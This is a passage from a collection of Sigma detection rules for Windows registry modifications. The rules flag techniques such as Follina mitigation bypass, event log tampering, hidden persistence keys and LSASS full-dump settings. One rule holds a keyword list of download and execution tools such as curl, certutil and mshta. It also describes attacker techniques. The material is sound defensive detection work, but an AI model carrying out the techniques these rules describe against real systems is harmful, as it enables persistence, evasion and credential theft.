    "content": "title: Scripted Diagnostics Turn Off Check Enabled - Registry\nid: 7d995e63-ec83-4aa3-89d5-8a17b5c87c86\nstatus: test\ndescription: Detects enabling TurnOffCheck, which can be used to bypass the mitigation for the MSDT Follina vulnerability\nreferences:\n    - https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw\nauthor: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io'\ndate: 2022-06-15\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Administrator actions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_evtx_file_key_tamper.yml",
    "content": "title: Potential EventLog File Location Tampering\nid: 0cb8d736-995d-4ce7-a31e-1e8d452a1459\nstatus: test\ndescription: Detects tampering with the EventLog service \"File\" key in order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key\nauthor: D3F7A5105\ndate: 2023-01-02\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\'\n        TargetObject|endswith: '\\File'\n    filter:\n        Details|contains: '\\System32\\Winevt\\Logs\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml",
    "content": "title: Suspicious Application Allowed Through Exploit Guard\nid: 42205c73-75c8-4a63-9db1-e3782e06fda0\nstatus: test\ndescription: Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings\nreferences:\n    - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_key:\n        TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications'\n    selection_paths:\n        TargetObject|contains:\n            # Add more paths you don't allow in your org\n            - '\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\PerfLogs\\'\n            - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml",
    "content": "title: Change User Account Associated with the FAX Service\nid: e3fdf743-f05b-4051-990a-b66919be1743\nstatus: test\ndescription: Detects a change of the user account associated with the FAX service, which is used to avoid the escalation problem.\nreferences:\n    - https://twitter.com/dottor_morte/status/1544652325570191361\n    - https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf\nauthor: frack113\ndate: 2022-07-17\nmodified: 2022-12-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject: HKLM\\System\\CurrentControlSet\\Services\\Fax\\ObjectName\n    filter:\n        Details|contains: NetworkService\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml",
    "content": "title: Change the Fax Dll\nid: 9e3357ba-09d4-4fbd-a7c5-ad6386314513\nstatus: test\ndescription: Detects possible persistence via a Fax DLL that is loaded when the service restarts\nreferences:\n    - https://twitter.com/dottor_morte/status/1544652325570191361\n    - https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf\nauthor: frack113\ndate: 2022-07-17\nmodified: 2022-12-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Software\\Microsoft\\Fax\\Device Providers\\'\n            - '\\ImageName'\n    filter:\n        Details: '%systemroot%\\system32\\fxst30.dll' # Windows 10\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_file_association_exefile.yml",
    "content": "title: New File Association Using Exefile\nid: 44a22d59-b175-4f13-8c16-cbaef5b581ff\nstatus: test\ndescription: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.\nreferences:\n    - https://twitter.com/mrd0x/status/1461041276514623491\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2021-11-19\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Classes\\.'\n        Details: 'exefile'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_filefix_typedpath_commands.yml",
    "content": "title: FileFix - Command Evidence in TypedPaths\nid: 4fee3d51-8069-4a4c-a0f7-924fcaff2c70\nrelated:\n    - id: 4be03877-d5b6-4520-85c9-a5911c0a656c\n      type: similar\nstatus: experimental\ndescription: |\n    Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.\nreferences:\n    - https://x.com/russianpanda9xx/status/1940831134759506029\n    - https://mrd0x.com/filefix-clickfix-alternative/\n    - https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\nauthor: Alfie Champion (delivr.to), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-05\nmodified: 2025-11-19\ntags:\n    - attack.execution\n    - attack.t1204.004\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_base:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1'\n        Details|contains|all:\n            - '#'\n            - 'http'\n    selection_cmd:\n        - Details|contains:\n              # Add more suspicious keywords\n              - 'account'\n              - 'anti-bot'\n              - 'botcheck'\n              - 'captcha'\n              - 'challenge'\n              - 'confirmation'\n              - 'fraud'\n              - 'human'\n              - 'identification'\n              - 'identificator'\n              - 'identity'\n              - 'robot'\n              - 'validation'\n              - 'verification'\n              - 'verify'\n        - Details|contains:\n              - '%comspec%'\n              - 'bitsadmin'\n              - 'certutil'\n              - 'cmd'\n              - 'cscript'\n              - 'curl'\n              - 'finger'\n              - 'mshta'\n              - 'powershell'\n              - 'pwsh'\n              - 'regsvr32'\n              - 'rundll32'\n              - 'schtasks'\n              - 'wget'\n              - 'wscript'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml",
    "content": "title: Add Debugger Entry To Hangs Key For Persistence\nid: 833ef470-fa01-4631-a79b-6f291c9ac498\nstatus: test\ndescription: Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence, which will get invoked when an application crashes\nreferences:\n    - https://persistence-info.github.io/Data/wer_debugger.html\n    - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger'\n    condition: selection\nfalsepositives:\n    - This value is not set by default but could be rarely used by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml",
    "content": "title: Persistence Via Hhctrl.ocx\nid: f10ed525-97fe-4fed-be7c-2feecca941b1\nstatus: test\ndescription: Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary\nreferences:\n    - https://persistence-info.github.io/Data/hhctrl.html\n    - https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)'\n    filter:\n        Details: 'C:\\Windows\\System32\\hhctrl.ocx'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hidden_extention.yml",
    "content": "title: Registry Modification to Hidden File Extension\nid: 5df86130-4e95-4a54-90f7-26541b40aec2\nstatus: test\ndescription: Detects modification of the registry to hide file extensions\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd\n    - https://unit42.paloaltonetworks.com/ransomware-families/\n    - https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A\nauthor: frack113\ndate: 2022-01-22\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.t1137\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_HideFileExt:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt'\n        Details: 'DWORD (0x00000001)'\n    selection_Hidden:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden'\n        Details: 'DWORD (0x00000002)'\n    condition: 1 of selection_*\nfalsepositives:\n    - Administrative scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hide_file.yml",
    "content": "title: Displaying Hidden Files Feature Disabled\nid: 5a5152f1-463f-436b-b2f5-8eceb3964b42\nstatus: test\ndescription: |\n    Detects modifications to the \"Hidden\" and \"ShowSuperHidden\" explorer registry values in order to disable showing of hidden files and system files.\n    This technique is abused by several malware families to hide their files from normal users.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry\nauthor: frack113\ndate: 2022-04-02\nmodified: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden'\n            - '\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hide_function_user.yml",
    "content": "title: Registry Hide Function from User\nid: 5a93eb65-dffa-4543-b761-94aa60098fb6\nstatus: test\ndescription: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md\nauthor: frack113\ndate: 2022-03-18\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_set_1:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume'\n        Details: 'DWORD (0x00000001)'\n    selection_set_0:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor'\n        Details: 'DWORD (0x00000000)'\n    condition: 1 of selection_set_*\nfalsepositives:\n    - Legitimate admin script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml",
    "content": "title: Hide Scheduled Task Via Index Value Tamper\nid: 5b16df71-8615-4f7f-ac9b-6c43c0509e61\nrelated:\n    - id: acd74772-5f88-45c7-956b-6a7b36c294d2\n      type: similar\n    - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec\n      type: similar\nstatus: test\ndescription: |\n    Detects when the \"Index\" value of a scheduled task is modified in the registry,\n    which effectively hides it from tooling such as \"schtasks /query\" (read the referenced link for more information about the effects of this technique)\nreferences:\n    - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-26\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\'\n            - 'Index'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hvci_disallowed_images.yml",
    "content": "title: Driver Added To Disallowed Images In HVCI - Registry\nid: 555155a2-03bf-4fe7-af74-d176b3fdbe16\nrelated:\n    - id: 44cee399-f6b1-45cc-a87c-ea14c6064d6b\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"HVCIDisallowedImages\" registry value to potentially add a driver to the list, in order to prevent it from loading.\nreferences:\n    - https://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf\n    - https://x.com/yarden_shafir/status/1822667605175324787\nauthor: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe)\ndate: 2023-12-05\nmodified: 2024-08-21\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Control\\CI\\'\n            - '\\HVCIDisallowedImages'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure it's intended\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml",
    "content": "title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols\nid: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724\nrelated:\n    - id: 10344bb3-7f65-46c2-b915-2d00d47be5b0\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\nreferences:\n    - https://twitter.com/M_haggis/status/1699056847154725107\n    - https://twitter.com/JAMESWT_MHT/status/1699042827261391247\n    - https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries\n    - https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content\nauthor: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)\ndate: 2023-09-05\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults'\n        TargetObject|endswith:\n            - '\\http'\n            - '\\https'\n        Details|contains: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_ime_non_default_extension.yml",
    "content": "title: Uncommon Extension In Keyboard Layout IME File Registry Value\nid: b888e3f2-224d-4435-b00b-9dd66e9ea1f1\nrelated:\n    - id: 9d8f9bb8-01af-4e15-a3a2-349071530530\n      type: derived\nstatus: test\ndescription: |\n    Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\n    Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named \"Ime File\" with a DLL path.\n    IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.\nreferences:\n    - https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-11-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Control\\Keyboard Layouts\\'\n            - 'Ime File'\n    filter_main_known_extension:\n        Details|endswith: '.ime'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_ime_suspicious_paths.yml",
    "content": "title: Suspicious Path In Keyboard Layout IME File Registry Value\nid: 9d8f9bb8-01af-4e15-a3a2-349071530530\nrelated:\n    - id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1\n      type: derived\nstatus: test\ndescription: |\n    Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\n    Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named \"Ime File\" with a DLL path.\n    IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.\nreferences:\n    - https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-11-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_registry:\n        TargetObject|contains|all:\n            - '\\Control\\Keyboard Layouts\\'\n            - 'Ime File'\n    selection_folders_1:\n        Details|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Temporary Internet'\n    selection_folders_2:\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n    condition: selection_registry and 1 of selection_folders_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml",
    "content": "title: New Root or CA or AuthRoot Certificate to Store\nid: d223b46b-5621-4037-88fe-fda32eead684\nstatus: test\ndescription: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store\n    - https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec\nauthor: frack113\ndate: 2022-04-04\nmodified: 2023-08-17\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates\\'\n            - '\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\'\n            - '\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\'\n            - '\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\'\n            - '\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\'\n            - '\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\'\n            - '\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\'\n            - '\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\'\n            - '\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates\\'\n        TargetObject|endswith: '\\Blob'\n        Details: 'Binary Data'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml",
    "content": "title: Internet Explorer DisableFirstRunCustomize Enabled\nid: ab567429-1dfb-4674-b6d2-979fd2f9d125\nstatus: test\ndescription: |\n    Detects changes to the Internet Explorer \"DisableFirstRunCustomize\" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\n    - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/\n    - https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-16\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize'\n        Details:\n            - 'DWORD (0x00000001)' # Home Page\n            - 'DWORD (0x00000002)' # Welcome To IE\n    filter_main_generic:\n        Image:\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\System32\\ie4uinit.exe'\n    filter_optional_avira:\n        Image|contains|all:\n            - '\\Temp\\'\n            - '\\.cr\\avira_'\n        Details|contains: 'DWORD (0x00000001)'\n    filter_optional_foxit:\n        Image:\n            - 'C:\\Program Files (x86)\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe'\n            - 'C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe'\n        Details|contains: 'DWORD (0x00000001)'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - As this value is controlled by group policy as well as user settings, some false positives may occur.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_legalnotice_susp_message.yml",
    "content": "title: Potential Ransomware Activity Using LegalNotice Message\nid: 8b9606c9-28be-4a38-b146-0e313cc232c1\nstatus: test\ndescription: Detects changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md\nauthor: frack113\ndate: 2022-12-11\nmodified: 2023-08-17\ntags:\n    - attack.impact\n    - attack.t1491.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption'\n            - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText'\n        Details|contains:\n            - 'encrypted'\n            - 'Unlock-Password'\n            - 'paying'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml",
    "content": "title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download\nid: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d\nstatus: test\ndescription: |\n    Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\n    anomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\PreSignInSettingsConfig.json\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/\nauthor: frack113\ndate: 2022-05-28\nmodified: 2023-08-17\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml",
    "content": "title: RestrictedAdminMode Registry Value Tampering\nid: d6ce7ebd-260b-4323-9768-a9631c8d4db2\nrelated:\n    - id: 28ac00d6-22d9-4a3c-927f-bbd770104573 # process_creation\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\n    RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\n    This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md\n    - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx\nauthor: frack113\ndate: 2023-01-13\nmodified: 2024-08-23\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: 'System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml",
    "content": "title: Lsass Full Dump Request Via DumpType Registry Settings\nid: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719\nstatus: test\ndescription: Detects the setting of the \"DumpType\" registry value to \"2\", which stands for a \"Full Dump\". Techniques such as LSASS Shtinkering require this value to be \"2\" in order to dump LSASS.\nreferences:\n    - https://github.com/deepinstinct/Lsass-Shtinkering\n    - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps\n    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\nauthor: '@pbssubhash'\ndate: 2022-12-08\nmodified: 2023-08-17\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType'\n            - '\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType'\n        Details: 'DWORD (0x00000002)' # Full Dump\n    condition: selection\nfalsepositives:\n    - Legitimate application that needs to do a full dump of their process\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml",
    "content": "title: NET NGenAssemblyUsageLog Registry Key Tamper\nid: 28036918-04d3-423d-91c0-55ecf99fb892\nstatus: test\ndescription: |\n    Detects changes to the NGenAssemblyUsageLog registry key.\n    The .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the referenced blog post).\n    By simply specifying an arbitrary value (e.g. a fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\nreferences:\n    - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/\nauthor: frack113\ndate: 2022-11-18\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: 'SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml",
